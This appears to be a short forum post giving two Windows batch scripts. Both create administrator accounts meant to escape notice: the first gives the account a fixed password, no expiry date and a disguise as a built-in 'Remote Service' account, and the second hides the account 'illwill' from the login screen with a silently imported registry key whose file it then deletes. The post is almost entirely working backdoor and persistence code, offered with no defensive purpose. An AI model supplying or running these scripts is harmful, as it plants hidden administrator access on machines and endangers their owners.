CODE
@echo off
net user IUSR_WAN /add /expires:never
net localgroup administrators /add IUSR_REMOTE
net user IUSR_WAN herman
net user IUSR_WAN /comment:"Built-in account for Remote Service"
net user IUSR_WAN /fullname:"Remote Service Account"
also another way that the user won't show on login screen!
CODE
@echo off
net user illwill password /add && net localgroup administrators illwill /add
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo "illwill"=dword:00000000>> c:\hide.reg
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
Exit

